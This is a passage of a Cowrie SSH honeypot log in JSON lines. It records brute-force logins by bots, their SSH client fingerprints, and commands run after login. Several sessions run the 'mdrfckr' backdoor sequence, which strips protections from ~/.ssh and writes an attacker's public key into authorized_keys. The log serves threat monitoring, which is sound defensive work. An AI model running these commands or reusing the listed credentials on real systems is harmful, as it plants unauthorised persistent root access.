{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T03:58:13.839836Z","src_ip":"212.227.235.229","session":"ec8a9b034df4"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":42452,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac2ef5f0b5ed","protocol":"ssh","message":"New connection: 211.22.25.164:42452 (1.2.3.4:22) [session: ac2ef5f0b5ed]","sensor":"my-vps","timestamp":"2025-09-09T03:58:17.220594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:17.221220Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:58:17.460989Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc.1234","message":"login attempt [root/Abc.1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:58:18.462298Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:58:19.012785Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:58:19.013488Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:58:19.014408Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:19.255268Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:58:19.751708Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:58:19.752436Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:58:19.994049Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:19.994903Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":42462,"dst_ip":"1.2.3.4","dst_port":22,"session":"950a034d1031","protocol":"ssh","message":"New connection: 211.22.25.164:42462 (1.2.3.4:22) [session: 950a034d1031]","sensor":"my-vps","timestamp":"2025-09-09T03:58:20.232661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:20.233588Z","src_ip":"211.22.25.164","session":"950a034d1031"}
{"eventid":"cowrie.session.connect","src_ip":"49.232.167.144","src_port":47052,"dst_ip":"1.2.3.4","dst_port":22,"session":"b02936d0f8b5","protocol":"ssh","message":"New connection: 49.232.167.144:47052 (1.2.3.4:22) [session: b02936d0f8b5]","sensor":"my-vps","timestamp":"2025-09-09T03:58:20.399148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:20.400438Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:58:20.473161Z","src_ip":"211.22.25.164","session":"950a034d1031"}
{"eventid":"cowrie.client.kex","hassh":"eff54deabf28030140ddf36c5b728546","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: eff54deabf28030140ddf36c5b728546","sensor":"my-vps","timestamp":"2025-09-09T03:58:20.619753Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:58:21.474386Z","src_ip":"211.22.25.164","session":"950a034d1031"}
{"eventid":"cowrie.login.success","username":"root","password":"calimero","message":"login attempt [root/calimero] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:58:21.533499Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:58:22.028553Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.029526Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.030713Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.249732Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:58:22.703260Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.704190Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.715928Z","src_ip":"211.22.25.164","session":"950a034d1031"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.924250Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.925192Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":42470,"dst_ip":"1.2.3.4","dst_port":22,"session":"967a063ad620","protocol":"ssh","message":"New connection: 211.22.25.164:42470 (1.2.3.4:22) [session: 967a063ad620]","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.955812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:22.956758Z","src_ip":"211.22.25.164","session":"967a063ad620"}
{"eventid":"cowrie.session.connect","src_ip":"49.232.167.144","src_port":47902,"dst_ip":"1.2.3.4","dst_port":22,"session":"3892822607fb","protocol":"ssh","message":"New connection: 49.232.167.144:47902 (1.2.3.4:22) [session: 3892822607fb]","sensor":"my-vps","timestamp":"2025-09-09T03:58:23.129336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:23.130288Z","src_ip":"49.232.167.144","session":"3892822607fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:58:23.196993Z","src_ip":"211.22.25.164","session":"967a063ad620"}
{"eventid":"cowrie.client.kex","hassh":"eff54deabf28030140ddf36c5b728546","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: eff54deabf28030140ddf36c5b728546","sensor":"my-vps","timestamp":"2025-09-09T03:58:23.339939Z","src_ip":"49.232.167.144","session":"3892822607fb"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:23.478571Z","src_ip":"212.227.235.229","session":"ec8a9b034df4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:58:24.198966Z","src_ip":"211.22.25.164","session":"967a063ad620"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:58:24.221774Z","src_ip":"49.232.167.144","session":"3892822607fb"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:24.440013Z","src_ip":"211.22.25.164","session":"ac2ef5f0b5ed"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:24.441604Z","src_ip":"211.22.25.164","session":"967a063ad620"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:25.432831Z","src_ip":"49.232.167.144","session":"3892822607fb"}
{"eventid":"cowrie.session.connect","src_ip":"49.232.167.144","src_port":48560,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d9a0cb62cf4","protocol":"ssh","message":"New connection: 49.232.167.144:48560 (1.2.3.4:22) [session: 7d9a0cb62cf4]","sensor":"my-vps","timestamp":"2025-09-09T03:58:25.629128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:25.630087Z","src_ip":"49.232.167.144","session":"7d9a0cb62cf4"}
{"eventid":"cowrie.client.kex","hassh":"eff54deabf28030140ddf36c5b728546","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: eff54deabf28030140ddf36c5b728546","sensor":"my-vps","timestamp":"2025-09-09T03:58:25.830953Z","src_ip":"49.232.167.144","session":"7d9a0cb62cf4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:58:26.672196Z","src_ip":"49.232.167.144","session":"7d9a0cb62cf4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:26.871479Z","src_ip":"49.232.167.144","session":"7d9a0cb62cf4"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:58:26.876560Z","src_ip":"49.232.167.144","session":"b02936d0f8b5"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":36732,"dst_ip":"1.2.3.4","dst_port":22,"session":"21d0ae6e5556","protocol":"ssh","message":"New connection: 152.32.190.168:36732 (1.2.3.4:22) [session: 21d0ae6e5556]","sensor":"my-vps","timestamp":"2025-09-09T03:58:46.523541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:58:46.525441Z","src_ip":"152.32.190.168","session":"21d0ae6e5556"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 